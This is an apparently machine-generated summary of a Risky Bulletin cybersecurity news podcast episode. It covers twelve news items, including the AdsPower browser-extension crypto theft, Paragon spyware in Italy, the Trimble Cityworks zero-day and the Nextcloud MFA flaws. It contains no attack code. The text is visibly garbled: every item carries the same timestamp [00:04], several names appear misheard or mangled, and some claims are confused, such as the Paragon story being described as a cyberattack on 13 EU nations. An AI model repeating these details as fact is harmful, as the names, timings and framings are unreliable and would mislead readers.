Risky Bulletin: Browser Extension Supply Chain Attack Hits AdsPower
Hosted by risky.biz | Released on February 7, 2025

The latest episode of Risky Bulletin, hosted by Claire Aird and prepared by Catalyn Kimparnu, delves into a series of significant cybersecurity incidents that have emerged recently. This detailed summary encapsulates the key discussions, insights, and conclusions presented in the episode, providing a comprehensive overview for those who haven’t had the chance to listen.

1. Crypto Theft via AdsPower Browser Extensions

Timestamp: [00:04]

The episode opens with a concerning development in the cryptocurrency realm. A threat actor successfully compromised browser extensions associated with the AdsPower platform, a specialized browser used by crypto enthusiasts. The attacker injected malicious code designed to steal wallet recovery phrases and private keys from users.

• Detection and Response: The breach occurred in January and was detected within three days. Upon discovery, ADSPower swiftly removed the compromised code and uninstalled the affected extensions from users' browsers.

• Financial Impact: Blockchain security firm Slowmist estimates that approximately $4.7 million in crypto assets were illicitly siphoned.

• Claire Aird Highlights: "A threat actor has compromised Crypto Wallet browser extensions for the AdsPower browser platform," ([00:04] Claire Aird).

2. Paragon’s Withdrawal from Italy’s Spyware Platform

Timestamp: [00:04]

The Israeli spyware company, Paragon, has reportedly ceased Italy's access to its surveillance platform following allegations that the Italian government utilized the software to monitor journalists and activists targeting Prime Minister Giorgia Meloni.

• Italian Response: Italian authorities have refuted these claims, maintaining that reports of government surveillance are unfounded.

• Broader Implications: This incident is part of a larger cyberattack affecting 13 other EU nations. Meta reports that seven of the targets are based in Italy.

3. U.S. Government Extends Workforce Buyout Program

Timestamp: [00:04]

In a strategic move, the Trump administration has broadened its workforce buyout initiative to include employees from the Cybersecurity and Infrastructure Security Agency (CISA), the Central Intelligence Agency (CIA), and the National Security Agency (NSA).

• Program Details: The buyout offers government workers the option to retain their current pay and benefits until the end of September if they resign within the week.

• Scope of Offer: Initially excluding CISA employees due to their roles tied to national security, the program now extends to over 2 million civilian federal workers.

• Quote from Claire Aird: "The White House has extended the buyout to over 2 million civilian federal workers," ([00:04] Claire Aird).

4. Disbandment of DOJ Task Force on Foreign Influence

Timestamp: [00:04]

New U.S. Attorney General Pam Bondi has dismantled a Justice Department task force established in 2017 to combat foreign influence operations targeting U.S. elections.

• Impact: The task force played a pivotal role in charging and sanctioning numerous Russian entities involved in information operations and bot farms aimed at destabilizing elections both domestically and internationally.

5. Taliban Data Leak from 21 Ministries

Timestamp: [00:04]

A significant leak has emerged involving documents from 21 Taliban ministries and government agencies, totaling over 50 gigabytes of data. These files, hosted on a website named Talib Leagues, disclose the names of political prisoners and details about government employees prohibited from leaving Afghanistan.

• Authenticity Affirmed: The Taliban has officially confirmed the legitimacy of the leaked documents.

6. Deloitte’s Settlement Over Ransomware Attack

Timestamp: [00:04]

Deloitte has agreed to pay $5 million to the state of Rhode Island in response to a ransomware attack that targeted the state's health and social services portal in December.

• Usage of Funds: The settlement will fund a call center for affected individuals, as well as credit monitoring and identity protection services.

7. EU’s Investigation into French IT Firm ATOS

Timestamp: [00:04]

European Union investigators have initiated an inquiry into the French IT company ATOS for allegedly employing staff based in Russia to develop the EU's new electronic border system.

• Concerns: The system is set to host the EU's largest biometric and personal information database. The European Public Prosecutors Office is scrutinizing potential Federal Security Service (FSB) involvement in ATOS's Russian operations.

8. Arrest of Suspect in Multi-Organization Cyberattacks

Timestamp: [00:04]

Spain's national police have apprehended a suspect in the city of Calpe for allegedly hacking over 40 organizations, including high-level Spanish government agencies, NATO, the U.S. Army networks, various private companies, and several dark web forums.

• Notable Incidents: The suspect is also believed to be behind the hack of the UN Civil Aviation body earlier this year.

9. Financial Troubles for Chinese Cyber Contractor Sichuan Silence

Timestamp: [00:04]

Sichuan Silence, the Chinese cyber contractor responsible for the widespread compromise of Sophos firewalls in 2020, has filed for bankruptcy as of December. This financial distress came shortly after the U.S. sanctioned the company and one of its employees.

• Legal Proceedings: Chinese court documents reveal that the sanctioned employee initiated a labor dispute against Sichuan Silence in July 2020.

• Claire Aird's Commentary: "China is the one place where cybercrime actually doesn't pay," ([00:04] Claire Aird).

10. Exploitation of Zero-Day Vulnerability in Trimble Cityworks

Timestamp: [00:04]

Hackers are exploiting a zero-day deserialization vulnerability in Trimble Cityworks, a platform utilized for managing critical physical infrastructure like water and sewage systems. This vulnerability permits remote code execution, enabling hackers to commandeer the platform.

• Malicious Deployments: The exploited vulnerability has been used to deploy Cobalt Strike implants and custom Rust malware on Cityworks servers.

11. Vulnerabilities in Nextcloud’s File Sharing Platform

Timestamp: [00:04]

Germany's cybersecurity agency, BSI, has identified multiple vulnerabilities in Nextcloud's file-sharing platform that could allow attackers to bypass multi-factor authentication (MFA).

• Security Audits: BSI has conducted recent security evaluations of several open-source projects, including KeePass, Bitwarden, and Vaultwarden. Responding to the findings, Nextcloud has patched all reported issues.

12. DDoS Attacks Targeting Bohemia Interactive’s Games

Timestamp: [00:04]

Game studio Bohemia Interactive is actively mitigating a series of Distributed Denial of Service (DDoS) attacks targeting its titles, Armor Reforger and DayZ. The attacks have been traced back to a Russian hacking group known as Star Squad Reborn.

• Motivation Behind Attacks: The group claims responsibility, stating that the attacks are in retaliation for the gaming studio's failure to invest in its servers over the past decade, which has resulted in subpar performance for gamers.

Conclusion

This episode of Risky Bulletin underscores the pervasive and evolving nature of cyber threats across various sectors and geopolitical landscapes. From financial theft in the crypto space to state-sponsored surveillance and infrastructure vulnerabilities, the discussions highlight the critical importance of robust cybersecurity measures and international cooperation in mitigating these risks.

Notable Quote Recap:

• "A threat actor has compromised Crypto Wallet browser extensions for the AdsPower browser platform," – Claire Aird ([00:04])
• "The White House has extended the buyout to over 2 million civilian federal workers," – Claire Aird ([00:04])
• "China is the one place where cybercrime actually doesn't pay," – Claire Aird ([00:04])

Stay Informed: For ongoing updates and in-depth analysis of cybersecurity news, tune into future episodes of Risky Bulletin.

This summary excludes advertisements, introductions, and outros to focus solely on the content-rich discussions presented in the episode.